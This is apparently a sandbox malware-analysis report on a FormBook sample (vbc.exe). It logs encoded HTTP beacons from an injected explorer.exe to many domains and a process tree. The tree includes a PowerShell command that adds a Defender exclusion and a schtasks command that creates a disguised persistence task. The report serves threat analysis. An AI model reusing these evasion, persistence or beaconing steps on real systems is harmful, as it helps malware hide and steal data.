Nov 9, 2021 12:57:46.126441956 CET	60599	53	192.168.2.7	8.8.8.8
Nov 9, 2021 12:57:47.157723904 CET	60599	53	192.168.2.7	8.8.8.8
Nov 9, 2021 12:57:47.272138119 CET	53	60599	8.8.8.8	192.168.2.7
Nov 9, 2021 12:57:48.252280951 CET	53	60599	8.8.8.8	192.168.2.7
Nov 9, 2021 12:57:49.299220085 CET	53	60599	8.8.8.8	192.168.2.7
Nov 9, 2021 12:57:52.316186905 CET	59571	53	192.168.2.7	8.8.8.8
Nov 9, 2021 12:57:52.362221003 CET	53	59571	8.8.8.8	192.168.2.7
Nov 9, 2021 12:57:57.381405115 CET	52689	53	192.168.2.7	8.8.8.8
Nov 9, 2021 12:57:57.404184103 CET	53	52689	8.8.8.8	192.168.2.7
Nov 9, 2021 12:58:02.464620113 CET	50290	53	192.168.2.7	8.8.8.8
Nov 9, 2021 12:58:02.505490065 CET	53	50290	8.8.8.8	192.168.2.7
Nov 9, 2021 12:58:07.645164967 CET	56209	53	192.168.2.7	8.8.8.8
Nov 9, 2021 12:58:07.974133968 CET	53	56209	8.8.8.8	192.168.2.7
Nov 9, 2021 12:58:13.521158934 CET	59582	53	192.168.2.7	8.8.8.8
Nov 9, 2021 12:58:13.542715073 CET	53	59582	8.8.8.8	192.168.2.7
Nov 9, 2021 12:58:18.693773031 CET	60949	53	192.168.2.7	8.8.8.8
Nov 9, 2021 12:58:18.740915060 CET	53	60949	8.8.8.8	192.168.2.7

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 9, 2021 12:57:48.252391100 CET	192.168.2.7	8.8.8.8	cffe	(Port unreachable)	Destination Unreachable
Nov 9, 2021 12:57:49.299372911 CET	192.168.2.7	8.8.8.8	cffe	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 9, 2021 12:57:17.065556049 CET	192.168.2.7	8.8.8.8	0xce70	Standard query (0)	www.sharpstead.com	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:22.879528999 CET	192.168.2.7	8.8.8.8	0x76b1	Standard query (0)	www.maikoufarm.com	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:28.956065893 CET	192.168.2.7	8.8.8.8	0x349c	Standard query (0)	www.septemberstockevent200.com	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:34.122539997 CET	192.168.2.7	8.8.8.8	0x3b78	Standard query (0)	www.joye.club	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:39.320169926 CET	192.168.2.7	8.8.8.8	0xfbda	Standard query (0)	www.mmj0115.xyz	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:45.131288052 CET	192.168.2.7	8.8.8.8	0xc50d	Standard query (0)	www.watermountsteam.top	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:46.126441956 CET	192.168.2.7	8.8.8.8	0xc50d	Standard query (0)	www.watermountsteam.top	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:47.157723904 CET	192.168.2.7	8.8.8.8	0xc50d	Standard query (0)	www.watermountsteam.top	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:52.316186905 CET	192.168.2.7	8.8.8.8	0x28ab	Standard query (0)	www.leewaysvcs.com	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:57.381405115 CET	192.168.2.7	8.8.8.8	0x9bdc	Standard query (0)	www.miabellavita.com	A (IP address)	IN (0x0001)
Nov 9, 2021 12:58:02.464620113 CET	192.168.2.7	8.8.8.8	0x2f30	Standard query (0)	www.yungbredda.com	A (IP address)	IN (0x0001)
Nov 9, 2021 12:58:07.645164967 CET	192.168.2.7	8.8.8.8	0xa6b4	Standard query (0)	www.joy1263.com	A (IP address)	IN (0x0001)
Nov 9, 2021 12:58:13.521158934 CET	192.168.2.7	8.8.8.8	0x527b	Standard query (0)	www.mattlambert.xyz	A (IP address)	IN (0x0001)
Nov 9, 2021 12:58:18.693773031 CET	192.168.2.7	8.8.8.8	0xd29c	Standard query (0)	www.annikadaniel.love	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 9, 2021 12:57:17.257793903 CET	8.8.8.8	192.168.2.7	0xce70	No error (0)	www.sharpstead.com		44.227.65.245	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:17.257793903 CET	8.8.8.8	192.168.2.7	0xce70	No error (0)	www.sharpstead.com		44.227.76.166	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:23.134397984 CET	8.8.8.8	192.168.2.7	0x76b1	No error (0)	www.maikoufarm.com		118.27.122.222	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:28.979376078 CET	8.8.8.8	192.168.2.7	0x349c	No error (0)	www.septemberstockevent200.com		172.67.188.247	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:28.979376078 CET	8.8.8.8	192.168.2.7	0x349c	No error (0)	www.septemberstockevent200.com		104.21.65.66	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:34.145211935 CET	8.8.8.8	192.168.2.7	0x3b78	No error (0)	www.joye.club	joye.club		CNAME (Canonical name)	IN (0x0001)
Nov 9, 2021 12:57:34.145211935 CET	8.8.8.8	192.168.2.7	0x3b78	No error (0)	joye.club		34.102.136.180	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:39.345231056 CET	8.8.8.8	192.168.2.7	0xfbda	No error (0)	www.mmj0115.xyz		101.132.116.91	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:47.272138119 CET	8.8.8.8	192.168.2.7	0xc50d	Server failure (2)	www.watermountsteam.top	none	none	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:48.252280951 CET	8.8.8.8	192.168.2.7	0xc50d	Server failure (2)	www.watermountsteam.top	none	none	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:49.299220085 CET	8.8.8.8	192.168.2.7	0xc50d	Server failure (2)	www.watermountsteam.top	none	none	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:52.362221003 CET	8.8.8.8	192.168.2.7	0x28ab	Name error (3)	www.leewaysvcs.com	none	none	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:57.404184103 CET	8.8.8.8	192.168.2.7	0x9bdc	No error (0)	www.miabellavita.com		104.21.4.114	A (IP address)	IN (0x0001)
Nov 9, 2021 12:57:57.404184103 CET	8.8.8.8	192.168.2.7	0x9bdc	No error (0)	www.miabellavita.com		172.67.132.7	A (IP address)	IN (0x0001)
Nov 9, 2021 12:58:02.505490065 CET	8.8.8.8	192.168.2.7	0x2f30	No error (0)	www.yungbredda.com	yungbredda.com		CNAME (Canonical name)	IN (0x0001)
Nov 9, 2021 12:58:02.505490065 CET	8.8.8.8	192.168.2.7	0x2f30	No error (0)	yungbredda.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 9, 2021 12:58:07.974133968 CET	8.8.8.8	192.168.2.7	0xa6b4	No error (0)	www.joy1263.com	s1.amhttpproxy.com		CNAME (Canonical name)	IN (0x0001)
Nov 9, 2021 12:58:07.974133968 CET	8.8.8.8	192.168.2.7	0xa6b4	No error (0)	s1.amhttpproxy.com	g380-5-g-1544770457451j.greycdn.net		CNAME (Canonical name)	IN (0x0001)
Nov 9, 2021 12:58:07.974133968 CET	8.8.8.8	192.168.2.7	0xa6b4	No error (0)	g380-5-g-1544770457451j.greycdn.net	y01-p380-01-def-006.greycdn.net		CNAME (Canonical name)	IN (0x0001)
Nov 9, 2021 12:58:07.974133968 CET	8.8.8.8	192.168.2.7	0xa6b4	No error (0)	y01-p380-01-def-006.greycdn.net	z010-gp-hk-06-75-adfh31.greycdn.net		CNAME (Canonical name)	IN (0x0001)
Nov 9, 2021 12:58:07.974133968 CET	8.8.8.8	192.168.2.7	0xa6b4	No error (0)	z010-gp-hk-06-75-adfh31.greycdn.net		103.118.81.108	A (IP address)	IN (0x0001)
Nov 9, 2021 12:58:13.542715073 CET	8.8.8.8	192.168.2.7	0x527b	No error (0)	www.mattlambert.xyz	mattlambert.xyz		CNAME (Canonical name)	IN (0x0001)
Nov 9, 2021 12:58:13.542715073 CET	8.8.8.8	192.168.2.7	0x527b	No error (0)	mattlambert.xyz		34.102.136.180	A (IP address)	IN (0x0001)
Nov 9, 2021 12:58:18.740915060 CET	8.8.8.8	192.168.2.7	0xd29c	No error (0)	www.annikadaniel.love	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)
Nov 9, 2021 12:58:18.740915060 CET	8.8.8.8	192.168.2.7	0xd29c	No error (0)	ghs.googlehosted.com		142.250.203.115	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.sharpstead.com

www.maikoufarm.com

www.septemberstockevent200.com

www.joye.club

www.mmj0115.xyz

www.miabellavita.com

www.yungbredda.com

www.mattlambert.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49794	44.227.65.245	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 9, 2021 12:57:17.665894032 CET	5058	OUT	GET /ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH HTTP/1.1 Host: www.sharpstead.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 9, 2021 12:57:17.870632887 CET	5100	IN	HTTP/1.1 307 Temporary Redirect Server: openresty Date: Tue, 09 Nov 2021 11:57:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 168 Connection: close Location: http://sharpstead.com X-Frame-Options: sameorigin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49815	118.27.122.222	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 9, 2021 12:57:23.410603046 CET	5345	OUT	GET /ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH HTTP/1.1 Host: www.maikoufarm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 9, 2021 12:57:23.685393095 CET	5346	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 09 Nov 2021 11:57:23 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.maikoufarm.com/ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49816	172.67.188.247	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 9, 2021 12:57:29.013758898 CET	5347	OUT	GET /ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH HTTP/1.1 Host: www.septemberstockevent200.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 9, 2021 12:57:29.071464062 CET	5347	IN	HTTP/1.1 302 Moved Temporarily Date: Tue, 09 Nov 2021 11:57:29 GMT Transfer-Encoding: chunked Connection: close Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Location: https://signup.stansberryresearch.com/?cid=MKT575714&eid=MKT576461 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eaxnl2g1qB4EKNecpVvmEZi95fe%2FGSpvnSEEKHNf8qw46BnT2fmXbf9fgVuI9f4GBFQvmjjnPSXjH%2BlqUzqjL3c0AeVf%2BqzaGX0zYcrmgmh7iKR6zHtTA8vRG1dd%2BMA%2FJBGDLVQI0PIAlJ4zcKEZgmU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ab6dd206aed4c32-AMS alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49818	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 9, 2021 12:57:34.168477058 CET	5355	OUT	GET /ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH HTTP/1.1 Host: www.joye.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 9, 2021 12:57:34.283009052 CET	5356	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 09 Nov 2021 11:57:34 GMT Content-Type: text/html Content-Length: 275 ETag: "6182ae77-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49821	101.132.116.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 9, 2021 12:57:39.595240116 CET	5368	OUT	GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1 Host: www.mmj0115.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 9, 2021 12:57:40.172657967 CET	5368	OUT	GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1 Host: www.mmj0115.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 9, 2021 12:57:40.442859888 CET	5368	IN	HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2021 11:57:40 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 74 30 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ht08/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.7	49847	104.21.4.114	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 9, 2021 12:57:57.423017979 CET	5431	OUT	GET /ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH HTTP/1.1 Host: www.miabellavita.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 9, 2021 12:57:57.453866005 CET	5431	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 09 Nov 2021 11:57:57 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Tue, 09 Nov 2021 12:57:57 GMT Location: https://www.miabellavita.com/ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ngg2DCxHyWdHCXK0qgT%2Fa3%2Bm%2FYtqmG%2F9iEyO3FQ5JEPbD7Xr7ssk1bZaOLRNXkbYFzaeZv%2Fc0jfh9cIJoMzcws%2FjFgr2Wr36hCnXGjq50WhiMn5NSYSmW7je%2F8SZPq1zUlQ6xutJCw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ab6ddd1fcd05c7a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.7	49848	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 9, 2021 12:58:02.526216030 CET	5432	OUT	GET /ht08/?iJB=h33IU5xP+CsHIX0jyOd12cEn3mj+DYpLQqBt2JgN37c56kNOSv5/h9LYm8RBo0LsRlylinxRVA==&IfNL=N8ph5BwH HTTP/1.1 Host: www.yungbredda.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 9, 2021 12:58:02.641443968 CET	5433	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 09 Nov 2021 11:58:02 GMT Content-Type: text/html Content-Length: 275 ETag: "6182ac26-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.7	49851	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 9, 2021 12:58:13.562832117 CET	5442	OUT	GET /ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH HTTP/1.1 Host: www.mattlambert.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 9, 2021 12:58:13.678078890 CET	5442	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 09 Nov 2021 11:58:13 GMT Content-Type: text/html Content-Length: 275 ETag: "6185407c-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: vbc.exe PID: 6420 Parent PID: 1596

General

Start time:	12:56:02
Start date:	09/11/2021
Path:	C:\Users\user\Desktop\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\vbc.exe"
Imagebase:	0x6f0000
File size:	368640 bytes
MD5 hash:	C4A1BDD685E346B7604F93357A922875
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 6604 Parent PID: 6420

General

Start time:	12:56:05
Start date:	09/11/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
Imagebase:	0x1110000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6612 Parent PID: 6604

General

Start time:	12:56:06
Start date:	09/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 6624 Parent PID: 6420

General

Start time:	12:56:06
Start date:	09/11/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
Imagebase:	0xc00000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6760 Parent PID: 6624

General

Start time:	12:56:07
Start date:	09/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 6824 Parent PID: 6420

General

Start time:	12:56:08
Start date:	09/11/2021
Path:	C:\Users\user\Desktop\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\vbc.exe
Imagebase:	0x7ff6e70f0000
File size:	368640 bytes
MD5 hash:	C4A1BDD685E346B7604F93357A922875
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
